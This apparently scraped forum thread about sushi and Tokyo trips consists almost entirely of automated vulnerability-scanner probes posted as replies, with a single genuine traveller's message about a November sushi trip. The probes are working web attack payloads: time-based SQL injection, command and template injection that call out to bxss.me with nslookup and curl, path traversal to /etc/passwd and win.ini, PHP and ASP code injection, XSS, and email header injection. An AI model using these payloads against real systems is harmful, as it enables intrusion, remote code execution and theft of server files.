Socket.gethostbyname("hitgy"+"gcnhqlgh215a3.bxss.me.")[3].to_s)+"
re: mirugai
bxss.me/t/xss.html?%00
re: mirugai
|(nslookup hitiyieycqope7437c.bxss.me||perl -e "gethostbyname('hitiyieycqope7437c.bxss.me')")
re: mirugai
Http://bxss.me/t/fit.txt
re: mirugai
file:///etc/passwd
re: mirugai
'+'A'.concat(70-3).concat(22*4).concat(117).concat(75).concat(118).concat(72)+(require'socket'
Socket.gethostbyname('hitwg'+'dyqruxked39ed.bxss.me.')[3].to_s)+'
re: mirugai
`(nslookup hitcuklgefphn9fb16.bxss.me||perl -e "gethostbyname('hitcuklgefphn9fb16.bxss.me')")`
re: mirugai
http://bxss.me/t/fit.txt%3F.jpg
re: mirugai
/\../\../\../\../\../\../\../etc/passwd
re: mirugai
;(nslookup hitwhkzalkrei0438b.bxss.me||perl -e "gethostbyname('hitwhkzalkrei0438b.bxss.me')")|(nslookup hitwhkzalkrei0438b.bxss.me||perl -e "gethostbyname('hitwhkzalkrei0438b.bxss.me')")&(nslookup hitwhkzalkrei0438b.bxss.me||perl -e "gethostbyname('hitwhkzalkrei0438b.bxss.me')")
re: mirugai
/etc/shells
re: mirugai
/WEB-INF/web.xml
re: mirugai
c:/windows/win.ini
re: mirugai
C:\WINDOWS\system32\drivers\etc\hosts
re: mirugai
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: mirugai
bxss.me
re: mirugai
../../../../../../../../../../windows/win.ini%00.jpg
re: mirugai
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: mirugai
/../../../../../../../../../../boot.ini
re: mirugai
';print(md5(31337));$a='
re: mirugai
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: mirugai
'"
re: mirugai
";print(md5(31337));$a="
re: mirugai
..\..\..\..\..\..\..\..\windows\win.ini
re: mirugai
<!--
re: mirugai
${@print(md5(31337))}
re: mirugai
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: mirugai
${@print(md5(31337))}\
re: mirugai
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: mirugai
'.print(md5(31337)).'
re: mirugai
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: mirugai
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: mirugai
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: mirugai
WEB-INF/web.xml
re: mirugai
WEB-INF\web.xml
re: mirugai
1C89YDI8G0
re: mirugai
response.write(9936642*9372159)
re: mirugai
'+response.write(9936642*9372159)+'
re: mirugai
"+response.write(9936642*9372159)+"
re: mirugai
../../../../../../../../../../../../../../etc/passwd
re: mirugai
../../../../../../../../../../../../../../windows/win.ini
re: mirugai
file:///etc/passwd
re: mirugai
<esi:include src="http://bxss.me/rpb.png"/>
re: mirugai
../
re: mirugai
${9999540+10000400}
re: mirugai
redirtest.acx
re: mirugai
)
re: mirugai
!(()&&!|*|*|
re: mirugai
^(#$!@#$)(()))******
re: mirugai
echo unzvgi$()\ fkznij\nz^xyu||a #' &echo unzvgi$()\ fkznij\nz^xyu||a #|" &echo unzvgi$()\ fkznij\nz^xyu||a #
re: mirugai
'.gethostbyname(lc('hitdm'.'ntmjbtikd02c5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(81).chr(118).chr(68).'
re: mirugai
&echo yayekh$()\ dmicqe\nz^xyu||a #' &echo yayekh$()\ dmicqe\nz^xyu||a #|" &echo yayekh$()\ dmicqe\nz^xyu||a #
re: mirugai
".gethostbyname(lc("hitio"."pcmjbyrbb3d57.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(70).chr(105).chr(90)."
re: mirugai
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: mirugai
|echo ixzhsw$()\ pbtsro\nz^xyu||a #' |echo ixzhsw$()\ pbtsro\nz^xyu||a #|" |echo ixzhsw$()\ pbtsro\nz^xyu||a #
re: mirugai
gethostbyname(lc('hitgz'.'acqbobvgde66f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(79).chr(107).chr(82)
re: mirugai
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: mirugai
expr 9000263502 - 983126
re: mirugai
/etc/shells
re: mirugai
(nslookup -q=cname hittwxzycxrcl5ad51.bxss.me||curl hittwxzycxrcl5ad51.bxss.me))
re: mirugai
ctime
sleep
p0
(I30
tp1
Rp2
.
re: mirugai
../../../../../../../../../../../../../../etc/shells
re: mirugai
$(nslookup -q=cname hitwzwmjvpjida2d2f.bxss.me||curl hitwzwmjvpjida2d2f.bxss.me)
re: mirugai
c:/windows/win.ini
re: mirugai
&nslookup -q=cname hitwmpsqswsfuec66e.bxss.me&'\"`0&nslookup -q=cname hitwmpsqswsfuec66e.bxss.me&`'
re: mirugai
bxss.me
re: mirugai
&(nslookup -q=cname hitvxivvpvvaha37db.bxss.me||curl hitvxivvpvvaha37db.bxss.me)&'\"`0&(nslookup -q=cname hitvxivvpvvaha37db.bxss.me||curl hitvxivvpvvaha37db.bxss.me)&`'
re: mirugai
Http://bxss.me/t/fit.txt
re: mirugai
|(nslookup -q=cname hitziljjpafor1b090.bxss.me||curl hitziljjpafor1b090.bxss.me)
re: mirugai
http://bxss.me/t/fit.txt?.jpg
re: mirugai
`(nslookup -q=cname hitqxtlnbnotm0619f.bxss.me||curl hitqxtlnbnotm0619f.bxss.me)`
re: mirugai
;(nslookup -q=cname hitjhgdiikyne5af3b.bxss.me||curl hitjhgdiikyne5af3b.bxss.me)|(nslookup -q=cname hitjhgdiikyne5af3b.bxss.me||curl hitjhgdiikyne5af3b.bxss.me)&(nslookup -q=cname hitjhgdiikyne5af3b.bxss.me||curl hitjhgdiikyne5af3b.bxss.me)
re: mirugai
'"()
re: mirugai
|(nslookup${IFS}-q${IFS}cname${IFS}hitnapgpbpivl01c73.bxss.me||curl${IFS}hitnapgpbpivl01c73.bxss.me)
re: mirugai
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: mirugai
'&&sleep(27*1000)*zwlmga&&'
re: mirugai
&(nslookup${IFS}-q${IFS}cname${IFS}hitcgzbiallzh46794.bxss.me||curl${IFS}hitcgzbiallzh46794.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitcgzbiallzh46794.bxss.me||curl${IFS}hitcgzbiallzh46794.bxss.me)&`'
re: mirugai
';print(md5(31337));$a='
re: mirugai
"&&sleep(27*1000)*yktssi&&"
re: mirugai
HttP://bxss.me/t/xss.html?%00
re: mirugai
";print(md5(31337));$a="
re: mirugai
'||sleep(27*1000)*anxcot||'
re: mirugai
bxss.me/t/xss.html?%00
re: mirugai
${@print(md5(31337))}
re: mirugai
"||sleep(27*1000)*nuffgm||"
re: mirugai
"+"A".concat(70-3).concat(22*4).concat(110).concat(77).concat(106).concat(80)+(require"socket"
Socket.gethostbyname("hittu"+"edemmcpje3b85.bxss.me.")[3].to_s)+"
re: mirugai
${@print(md5(31337))}\
re: mirugai
'+'A'.concat(70-3).concat(22*4).concat(120).concat(74).concat(108).concat(74)+(require'socket'
Socket.gethostbyname('hityp'+'vagneoiv40f25.bxss.me.')[3].to_s)+'
re: mirugai
'A'.concat(70-3).concat(22*4).concat(117).concat(85).concat(101).concat(88)+(require'socket'
Socket.gethostbyname('hitjc'+'zrwdkyin6300b.bxss.me.')[3].to_s)
re: mirugai
'.print(md5(31337)).'
re: mirugai
'"
re: mirugai
<!--
re: mirugai
replies
re: mirugai
replies�
re: mirugai
replies/.
re: mirugai
'"()&%<zzz><ScRiPt >NTYV(9903)</ScRiPt>
re: mirugai
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitjgddxcdpuzf2495.bxss.me")}}
re: mirugai
'"()&%<zzz><ScRiPt >NTYV(9638)</ScRiPt>
re: mirugai
9276027
re: mirugai
YBxDNn7b
re: mirugai
*1
re: mirugai
*1
re: mirugai
*1
re: mirugai
*1
re: mirugai
-1 OR 5*5=25 --
re: mirugai
-1 OR 5*5=26 --
re: mirugai
-1 OR 5*5=25
re: mirugai
-1 OR 5*5=26
re: mirugai
*if(now()=sysdate(),sleep(15),0)
re: mirugai
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: mirugai
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: mirugai
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: mirugai
-1; waitfor delay '0:0:15' --
re: mirugai
-1); waitfor delay '0:0:15' --
re: mirugai
-1 waitfor delay '0:0:15' --
re: mirugai
ceEOfpq7'; waitfor delay '0:0:15' --
re: mirugai
-1 OR 451=(SELECT 451 FROM PG_SLEEP(15))--
re: mirugai
-1) OR 460=(SELECT 460 FROM PG_SLEEP(15))--
re: mirugai
-1)) OR 979=(SELECT 979 FROM PG_SLEEP(15))--
re: mirugai
q568YZCD' OR 371=(SELECT 371 FROM PG_SLEEP(15))--
re: mirugai
XxX0cdVf') OR 392=(SELECT 392 FROM PG_SLEEP(15))--
re: mirugai
2VbosJxt')) OR 478=(SELECT 478 FROM PG_SLEEP(15))--
re: mirugai
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: mirugai
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: mirugai
'||(select 1 from (select pg_sleep(15))x)||'
re: mirugai
''||(select 1 from (select pg_sleep(15))x)||''
re: mirugai
'"
re: mirugai
@@fOzRW
re: mirugai
(select 198766*667891)
re: mirugai
(select 198766*667891 from DUAL)
Hi guys, nice to see some familiar faces in here. Thanks Saito-san for the massive guide which will make me FOMO into getting reservations at many places I've never heard of (lol). Anyone heading to Tokyo sometime soon? I'm going in November and having a long-awaited sushi bonanza after being deprived of great sushi for years! Super excited!
re: Just_Ingest
0zmgmc9c
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
-1 OR 2+382-382-1=0+0+0+1
re: Just_Ingest
-1 OR 3+382-382-1=0+0+0+1
re: Just_Ingest
if(now()=sysdate(),sleep(15),0)
re: Just_Ingest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Just_Ingest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Just_Ingest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Just_Ingest
-1; waitfor delay '0:0:15' --
re: Just_Ingest
-1); waitfor delay '0:0:15' --
re: Just_Ingest
1 waitfor delay '0:0:15' --
re: Just_Ingest
8xt32FD1'; waitfor delay '0:0:15' --
re: Just_Ingest
-5 OR 240=(SELECT 240 FROM PG_SLEEP(15))--
re: Just_Ingest
-5) OR 181=(SELECT 181 FROM PG_SLEEP(15))--
re: Just_Ingest
-1)) OR 238=(SELECT 238 FROM PG_SLEEP(15))--
re: Just_Ingest
9xyBuX30' OR 324=(SELECT 324 FROM PG_SLEEP(15))--
re: Just_Ingest
mvFPjq1T') OR 615=(SELECT 615 FROM PG_SLEEP(15))--
re: Just_Ingest
cbfHtB58')) OR 93=(SELECT 93 FROM PG_SLEEP(15))--
re: Just_Ingest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Just_Ingest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Just_Ingest
'||(select 1 from (select pg_sleep(15))x)||'
re: Just_Ingest
''||(select 1 from (select pg_sleep(15))x)||''
re: Just_Ingest
1'"
re: Just_Ingest
@@2a2LQ
re: Just_Ingest
1VD9Q509rO
re: Just_Ingest
%0abcc:074625.67-22317.67.8afc5.19990.2@bxss.me
re: Just_Ingest
response.write(9743929*9996991)
re: Just_Ingest
to@example.com>%0d%0abcc:074625.67-22318.67.8afc5.19990.2@bxss.me
re: Just_Ingest
'+response.write(9743929*9996991)+'
re: Just_Ingest
"+response.write(9743929*9996991)+"
re: Just_Ingest
<esi:include src="http://bxss.me/rpb.png"/>
re: Just_Ingest
${9999131+9999784}
re: Just_Ingest
../../../../../../../../../../../../../../etc/passwd
re: Just_Ingest
../../../../../../../../../../../../../../windows/win.ini
re: Just_Ingest
file:///etc/passwd
re: Just_Ingest
../../../../../../../../../../../../../../../proc/version
re: Just_Ingest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Just_Ingest
../../../../../../../../../../etc/passwd%00.jpg
re: Just_Ingest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Just_Ingest
)
re: Just_Ingest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Just_Ingest
!(()&&!|*|*|
re: Just_Ingest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Just_Ingest
^(#$!@#$)(()))******
re: Just_Ingest
/etc/passwd
re: Just_Ingest
%2fetc%2fpasswd
re: Just_Ingest
echo ynfnyq$()\ mqjlcx\nz^xyu||a #' &echo ynfnyq$()\ mqjlcx\nz^xyu||a #|" &echo ynfnyq$()\ mqjlcx\nz^xyu||a #
re: Just_Ingest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Just_Ingest
&echo qjpuqz$()\ jafqhw\nz^xyu||a #' &echo qjpuqz$()\ jafqhw\nz^xyu||a #|" &echo qjpuqz$()\ jafqhw\nz^xyu||a #
re: Just_Ingest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Just_Ingest
|echo huvmqd$()\ enyfvu\nz^xyu||a #' |echo huvmqd$()\ enyfvu\nz^xyu||a #|" |echo huvmqd$()\ enyfvu\nz^xyu||a #
re: Just_Ingest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Just_Ingest
'.gethostbyname(lc('hitkf'.'mkliswfb5a3d9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(90).chr(110).chr(70).'
re: Just_Ingest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Just_Ingest
(nslookup hitpnwflzkqee6bdc8.bxss.me||perl -e "gethostbyname('hitpnwflzkqee6bdc8.bxss.me')")
re: Just_Ingest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Just_Ingest
".gethostbyname(lc("hituc"."jshyspsh68504.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(73).chr(116).chr(70)."
re: Just_Ingest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Just_Ingest
$(nslookup hitobauptejbj6529a.bxss.me||perl -e "gethostbyname('hitobauptejbj6529a.bxss.me')")
re: Just_Ingest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Just_Ingest
Http://bxss.me/t/fit.txt
re: Just_Ingest
&nslookup hitgkoqvavasi0bc1b.bxss.me&'\"`0&nslookup hitgkoqvavasi0bc1b.bxss.me&`'
re: Just_Ingest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Just_Ingest
http://bxss.me/t/fit.txt%3F.jpg
re: Just_Ingest
&(nslookup hitmctzzpxrcn1af2e.bxss.me||perl -e "gethostbyname('hitmctzzpxrcn1af2e.bxss.me')")&'\"`0&(nslookup hitmctzzpxrcn1af2e.bxss.me||perl -e "gethostbyname('hitmctzzpxrcn1af2e.bxss.me')")&`'
re: Just_Ingest
file:///etc/passwd
re: Just_Ingest
/etc/shells
re: Just_Ingest
|(nslookup hitgzmwvlcwnlca6ef.bxss.me||perl -e "gethostbyname('hitgzmwvlcwnlca6ef.bxss.me')")
re: Just_Ingest
/\../\../\../\../\../\../\../etc/passwd
re: Just_Ingest
c:/windows/win.ini
re: Just_Ingest
`(nslookup hiteiihnxfxsz9ee2c.bxss.me||perl -e "gethostbyname('hiteiihnxfxsz9ee2c.bxss.me')")`
re: Just_Ingest
/WEB-INF/web.xml
re: Just_Ingest
HttP://bxss.me/t/xss.html?%00
re: Just_Ingest
"+"A".concat(70-3).concat(22*4).concat(103).concat(86).concat(120).concat(67)+(require"socket"
Socket.gethostbyname("hitgv"+"fmzineuf0f201.bxss.me.")[3].to_s)+"
re: Just_Ingest
bxss.me
re: Just_Ingest
;(nslookup hitiupumwbjkjb59d8.bxss.me||perl -e "gethostbyname('hitiupumwbjkjb59d8.bxss.me')")|(nslookup hitiupumwbjkjb59d8.bxss.me||perl -e "gethostbyname('hitiupumwbjkjb59d8.bxss.me')")&(nslookup hitiupumwbjkjb59d8.bxss.me||perl -e "gethostbyname('hitiupumwbjkjb59d8.bxss.me')")
re: Just_Ingest
C:\WINDOWS\system32\drivers\etc\hosts
re: Just_Ingest
bxss.me/t/xss.html?%00
re: Just_Ingest
'+'A'.concat(70-3).concat(22*4).concat(102).concat(82).concat(98).concat(68)+(require'socket'
Socket.gethostbyname('hithi'+'lvulfvjcd4baf.bxss.me.')[3].to_s)+'
re: Just_Ingest
../../../../../../../../../../windows/win.ini%00.jpg
re: Just_Ingest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Just_Ingest
/../../../../../../../../../../boot.ini
re: Just_Ingest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Just_Ingest
';print(md5(31337));$a='
re: Just_Ingest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Just_Ingest
";print(md5(31337));$a="
re: Just_Ingest
..\..\..\..\..\..\..\..\windows\win.ini
re: Just_Ingest
${@print(md5(31337))}
re: Just_Ingest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Just_Ingest
'"
re: Just_Ingest
${@print(md5(31337))}\
re: Just_Ingest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Just_Ingest
<!--
re: Just_Ingest
'.print(md5(31337)).'
re: Just_Ingest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Just_Ingest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Just_Ingest
